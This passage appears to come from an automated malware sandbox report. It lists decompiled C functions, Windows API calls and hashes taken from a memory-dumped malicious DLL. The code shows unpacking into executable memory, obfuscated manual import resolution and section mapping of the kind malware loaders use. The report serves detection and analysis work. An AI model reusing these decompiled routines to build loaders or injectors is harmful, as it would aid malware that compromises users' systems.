
                                                                                                                          Function 6E37DFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6E37DA28), ref: 6E37E097
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E37DA88), ref: 6E37E0CE
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E37E12E
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E164
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00000000,00000004,6E37DFB9), ref: 6E37E269
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00001000,00000004,6E37DFB9), ref: 6E37E290
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9), ref: 6E37E35D
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9,?), ref: 6E37E3B3
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E3CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186488728.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2574235972-0
                                                                                                                          • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                          • Instruction ID: ee031c514a6d591727bb3d66cb2cb26eccd2cfbf2f132f1a8349e6477fbc51b9
                                                                                                                          • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                          • Instruction Fuzzy Hash: 4DD18E325206219FDF22CF55CC80A9237E7FF49B91F0841A8ED4A9F34AD375AA01CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D15C6, Relevance: 13.6, APIs: 9, Instructions: 120sleepnativesynchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E6E2D15C6(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E6E2D1825();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E6E2D1000(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E6E2D1397(_t57);
						}
					} while (_v8 != 0);
					_t27 = E6E2D189E(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E6E2D153C(E6E2D10B9,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E6E2D1AD7(_t53,  &_a4) != 0) {
					 *0x6e2d41b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x6e2d41b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E6E2D1000(_t60 + _t19);
				 *0x6e2d41b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E6E2D1397(_t52);
				goto L18;
			}
























                                                                                                                          0x6e2d15cc
                                                                                                                          0x6e2d15d1
                                                                                                                          0x6e2d15d6
                                                                                                                          0x6e2d1701
                                                                                                                          0x6e2d1701
                                                                                                                          0x6e2d15df
                                                                                                                          0x6e2d15df
                                                                                                                          0x6e2d15e3
                                                                                                                          0x6e2d15e6
                                                                                                                          0x6e2d15e7
                                                                                                                          0x6e2d15ed
                                                                                                                          0x6e2d15f1
                                                                                                                          0x6e2d1628
                                                                                                                          0x6e2d15f3
                                                                                                                          0x6e2d15fb
                                                                                                                          0x6e2d1601
                                                                                                                          0x6e2d1603
                                                                                                                          0x6e2d1608
                                                                                                                          0x6e2d160e
                                                                                                                          0x6e2d1610
                                                                                                                          0x6e2d1610
                                                                                                                          0x6e2d1617
                                                                                                                          0x6e2d161d
                                                                                                                          0x6e2d161d
                                                                                                                          0x6e2d1621
                                                                                                                          0x6e2d1621
                                                                                                                          0x6e2d162f
                                                                                                                          0x6e2d1636
                                                                                                                          0x6e2d163f
                                                                                                                          0x6e2d1642
                                                                                                                          0x6e2d1648
                                                                                                                          0x6e2d164b
                                                                                                                          0x6e2d1654
                                                                                                                          0x6e2d16fd
                                                                                                                          0x00000000
                                                                                                                          0x6e2d16ff
                                                                                                                          0x6e2d165d
                                                                                                                          0x6e2d16ae
                                                                                                                          0x6e2d16ae
                                                                                                                          0x6e2d16c4
                                                                                                                          0x6e2d16c8
                                                                                                                          0x6e2d16f0
                                                                                                                          0x6e2d16ca
                                                                                                                          0x6e2d16cd
                                                                                                                          0x6e2d16d3
                                                                                                                          0x6e2d16d8
                                                                                                                          0x6e2d16df
                                                                                                                          0x6e2d16df
                                                                                                                          0x6e2d16e6
                                                                                                                          0x6e2d16e6
                                                                                                                          0x6e2d16f3
                                                                                                                          0x6e2d16f9
                                                                                                                          0x6e2d16fb
                                                                                                                          0x6e2d16fb
                                                                                                                          0x00000000
                                                                                                                          0x6e2d16f9
                                                                                                                          0x6e2d166a
                                                                                                                          0x6e2d16a8
                                                                                                                          0x00000000
                                                                                                                          0x6e2d16a8
                                                                                                                          0x6e2d166c
                                                                                                                          0x6e2d1671
                                                                                                                          0x6e2d1678
                                                                                                                          0x6e2d167a
                                                                                                                          0x6e2d167e
                                                                                                                          0x6e2d16a0
                                                                                                                          0x6e2d16a0
                                                                                                                          0x00000000
                                                                                                                          0x6e2d16a0
                                                                                                                          0x6e2d1680
                                                                                                                          0x6e2d1685
                                                                                                                          0x6e2d168a
                                                                                                                          0x6e2d1691
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1696
                                                                                                                          0x6e2d1699
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2D1825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2D15D1), ref: 6E2D1834
                                                                                                                            • Part of subcall function 6E2D1825: GetVersion.KERNEL32 ref: 6E2D1843
                                                                                                                            • Part of subcall function 6E2D1825: GetCurrentProcessId.KERNEL32 ref: 6E2D185F
                                                                                                                            • Part of subcall function 6E2D1825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2D1878
                                                                                                                            • Part of subcall function 6E2D1000: HeapAlloc.KERNEL32(00000000,?,6E2D15ED,00000030,73B763F0,00000000), ref: 6E2D100C
                                                                                                                          • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 6E2D15FB
                                                                                                                          • Sleep.KERNELBASE(00000000,00000000,00000030,73B763F0,00000000), ref: 6E2D1642
                                                                                                                          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2D1678
                                                                                                                          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2D1696
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,6E2D10B9,?,00000000), ref: 6E2D16CD
                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 6E2D16DF
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6E2D16E6
                                                                                                                          • GetLastError.KERNEL32(6E2D10B9,?,00000000), ref: 6E2D16EE
                                                                                                                          • GetLastError.KERNEL32 ref: 6E2D16FB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3479304935-0
                                                                                                                          • Opcode ID: 19ecee1ddca25a873985523a9a549fad8d1b4870026fa34f0f81eecc6887921a
                                                                                                                          • Instruction ID: 53b62928b4dd85e632d40fb7ed7caca95fb4b5088f728fd8fde333475fbe5395
                                                                                                                          • Opcode Fuzzy Hash: 19ecee1ddca25a873985523a9a549fad8d1b4870026fa34f0f81eecc6887921a
                                                                                                                          • Instruction Fuzzy Hash: D631B275D0461EABD7509BE4CC48A9E7BBEAB46766F144122EB00D3540DB30CACCCBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D1172, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E6E2D1172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E2D2160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e2d41c4;
				_push(_t15 + 0x6e2d505e);
				_push(_t15 + 0x6e2d5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E2D215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e2d41c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                          0x6e2d1172
                                                                                                                          0x6e2d117b
                                                                                                                          0x6e2d117f
                                                                                                                          0x6e2d1185
                                                                                                                          0x6e2d118a
                                                                                                                          0x6e2d118f
                                                                                                                          0x6e2d1192
                                                                                                                          0x6e2d1195
                                                                                                                          0x6e2d119a
                                                                                                                          0x6e2d119b
                                                                                                                          0x6e2d119e
                                                                                                                          0x6e2d11a9
                                                                                                                          0x6e2d11b0
                                                                                                                          0x6e2d11b4
                                                                                                                          0x6e2d11b6
                                                                                                                          0x6e2d11b7
                                                                                                                          0x6e2d11ba
                                                                                                                          0x6e2d11bf
                                                                                                                          0x6e2d11c9
                                                                                                                          0x6e2d11cb
                                                                                                                          0x6e2d11cb
                                                                                                                          0x6e2d11df
                                                                                                                          0x6e2d11e5
                                                                                                                          0x6e2d11e9
                                                                                                                          0x6e2d1239
                                                                                                                          0x6e2d11eb
                                                                                                                          0x6e2d11f4
                                                                                                                          0x6e2d120a
                                                                                                                          0x6e2d1212
                                                                                                                          0x6e2d1224
                                                                                                                          0x6e2d1228
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1214
                                                                                                                          0x6e2d1217
                                                                                                                          0x6e2d121c
                                                                                                                          0x6e2d121e
                                                                                                                          0x6e2d121e
                                                                                                                          0x6e2d11ff
                                                                                                                          0x6e2d1201
                                                                                                                          0x6e2d122a
                                                                                                                          0x6e2d122b
                                                                                                                          0x6e2d122b
                                                                                                                          0x6e2d11f4
                                                                                                                          0x6e2d1241

                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?,?), ref: 6E2D117F
                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E2D1195
                                                                                                                          • _snwprintf.NTDLL ref: 6E2D11BA
                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,6E2D41C8,00000004,00000000,?,?), ref: 6E2D11DF
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?), ref: 6E2D11F6
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E2D120A
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?), ref: 6E2D1222
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A), ref: 6E2D122B
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?), ref: 6E2D1233
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1724014008-0
                                                                                                                          • Opcode ID: 3fd14a25436f99e638c1011dafc1ba8497cc7a3d5337baf7d020c32aeecc8cee
                                                                                                                          • Instruction ID: c401ed905ab27c145aab1f909071ab6585dc911f1880a00846148f1749ad1bcb
                                                                                                                          • Opcode Fuzzy Hash: 3fd14a25436f99e638c1011dafc1ba8497cc7a3d5337baf7d020c32aeecc8cee
                                                                                                                          • Instruction Fuzzy Hash: 612190B690011DAFDB00AFE8CC8CE9E77BAFB49356F118125F715E7180D6B199498B70
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2E5600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E2E5696
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37B7A0,000008BB), ref: 6E2E576F
                                                                                                                            • Part of subcall function 6E2E72B0: task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EBA20: swap.LIBCPMTD ref: 6E2EBA39
                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E367144,?,?,?,?,?,00000000), ref: 6E2E5950
                                                                                                                          • std::locale::locale.LIBCPMTD ref: 6E2E59D8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                          • String ID: ?
                                                                                                                          • API String ID: 756721536-1684325040
                                                                                                                          • Opcode ID: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction ID: 09b3f38f99fddfd30bda2fb762b5b80dca631554444c509bd5469c0b50b8b9ad
                                                                                                                          • Opcode Fuzzy Hash: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction Fuzzy Hash: 295293B0900538CFCF08CFA8D990BAD77BAFB8A305F6089A9D54597794D738D849DB48
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D13B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E6E2D13B8(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E2D1273(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                          0x6e2d13c1
                                                                                                                          0x6e2d13c8
                                                                                                                          0x6e2d13c9
                                                                                                                          0x6e2d13ca
                                                                                                                          0x6e2d13cb
                                                                                                                          0x6e2d13cc
                                                                                                                          0x6e2d13dd
                                                                                                                          0x6e2d13e1
                                                                                                                          0x6e2d13f5
                                                                                                                          0x6e2d13f8
                                                                                                                          0x6e2d13fb
                                                                                                                          0x6e2d1402
                                                                                                                          0x6e2d1405
                                                                                                                          0x6e2d140c
                                                                                                                          0x6e2d140f
                                                                                                                          0x6e2d1412
                                                                                                                          0x6e2d1415
                                                                                                                          0x6e2d141a
                                                                                                                          0x6e2d1455
                                                                                                                          0x6e2d141c
                                                                                                                          0x6e2d141f
                                                                                                                          0x6e2d1425
                                                                                                                          0x6e2d142a
                                                                                                                          0x6e2d142e
                                                                                                                          0x6e2d144c
                                                                                                                          0x6e2d1430
                                                                                                                          0x6e2d1437
                                                                                                                          0x6e2d1445
                                                                                                                          0x6e2d1445
                                                                                                                          0x6e2d142e
                                                                                                                          0x6e2d145d

                                                                                                                          APIs
                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E2D1415
                                                                                                                            • Part of subcall function 6E2D1273: NtMapViewOfSection.NTDLL(00000000,000000FF,6E2D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E2D142A,?), ref: 6E2D12A0
                                                                                                                          • memset.NTDLL ref: 6E2D1437
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$CreateViewmemset
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 2533685722-2766056989
                                                                                                                          • Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                          • Instruction ID: da103a6dc877d17a48853b67eb719e86aacf98774dc14ec4741c6c04df4d893b
                                                                                                                          • Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                          • Instruction Fuzzy Hash: 0C210BB5D0020DAFDB01DFE9C8849DEFBB9EF48354F108929E655F3610D731AA488BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D1DE5, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D1DE5(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e2d41c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                                                                          0x6e2d1de5
                                                                                                                          0x6e2d1dee
                                                                                                                          0x6e2d1df3
                                                                                                                          0x6e2d1df9
                                                                                                                          0x6e2d1e02
                                                                                                                          0x6e2d1e08
                                                                                                                          0x6e2d1e0a
                                                                                                                          0x6e2d1e0d
                                                                                                                          0x6e2d1e12
                                                                                                                          0x6e2d1e19
                                                                                                                          0x6e2d1e19
                                                                                                                          0x6e2d1e1d
                                                                                                                          0x6e2d1e23
                                                                                                                          0x6e2d1e28
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1e2e
                                                                                                                          0x6e2d1e38
                                                                                                                          0x6e2d1e3a
                                                                                                                          0x6e2d1e3d
                                                                                                                          0x6e2d1e40
                                                                                                                          0x6e2d1e44
                                                                                                                          0x6e2d1e4c
                                                                                                                          0x6e2d1e4e
                                                                                                                          0x6e2d1e51
                                                                                                                          0x6e2d1eb9
                                                                                                                          0x6e2d1eb9
                                                                                                                          0x6e2d1ebd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1e56
                                                                                                                          0x6e2d1e5c
                                                                                                                          0x6e2d1e5e
                                                                                                                          0x6e2d1e71
                                                                                                                          0x6e2d1e74
                                                                                                                          0x6e2d1e74
                                                                                                                          0x6e2d1e74
                                                                                                                          0x6e2d1e78
                                                                                                                          0x6e2d1e60
                                                                                                                          0x6e2d1e60
                                                                                                                          0x6e2d1e68
                                                                                                                          0x6e2d1e6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1e6a
                                                                                                                          0x6e2d1e58
                                                                                                                          0x6e2d1e58
                                                                                                                          0x6e2d1e6c
                                                                                                                          0x6e2d1e6c
                                                                                                                          0x6e2d1e6c
                                                                                                                          0x6e2d1e7b
                                                                                                                          0x6e2d1e7e
                                                                                                                          0x6e2d1e80
                                                                                                                          0x6e2d1e87
                                                                                                                          0x6e2d1e82
                                                                                                                          0x6e2d1e82
                                                                                                                          0x6e2d1e82
                                                                                                                          0x6e2d1e8f
                                                                                                                          0x6e2d1e95
                                                                                                                          0x6e2d1e97
                                                                                                                          0x6e2d1ec7
                                                                                                                          0x6e2d1e99
                                                                                                                          0x6e2d1e99
                                                                                                                          0x6e2d1e9c
                                                                                                                          0x6e2d1e9e
                                                                                                                          0x6e2d1ea6
                                                                                                                          0x6e2d1ea6
                                                                                                                          0x6e2d1eab
                                                                                                                          0x6e2d1ead
                                                                                                                          0x6e2d1eb4
                                                                                                                          0x6e2d1eb6
                                                                                                                          0x6e2d1eb6
                                                                                                                          0x6e2d1eb6
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1eb6
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1e97
                                                                                                                          0x6e2d1e46
                                                                                                                          0x6e2d1e46
                                                                                                                          0x6e2d1e4a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1e4a
                                                                                                                          0x6e2d1eca
                                                                                                                          0x6e2d1eca
                                                                                                                          0x6e2d1ed1
                                                                                                                          0x6e2d1ed6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1edc
                                                                                                                          0x6e2d1ee7
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1ee7
                                                                                                                          0x6e2d1ede
                                                                                                                          0x6e2d1ede
                                                                                                                          0x6e2d1ee4
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1ee4
                                                                                                                          0x6e2d1e12
                                                                                                                          0x6e2d1ee8
                                                                                                                          0x6e2d1eed

                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E2D1E1D
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 6E2D1E8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2574300362-0
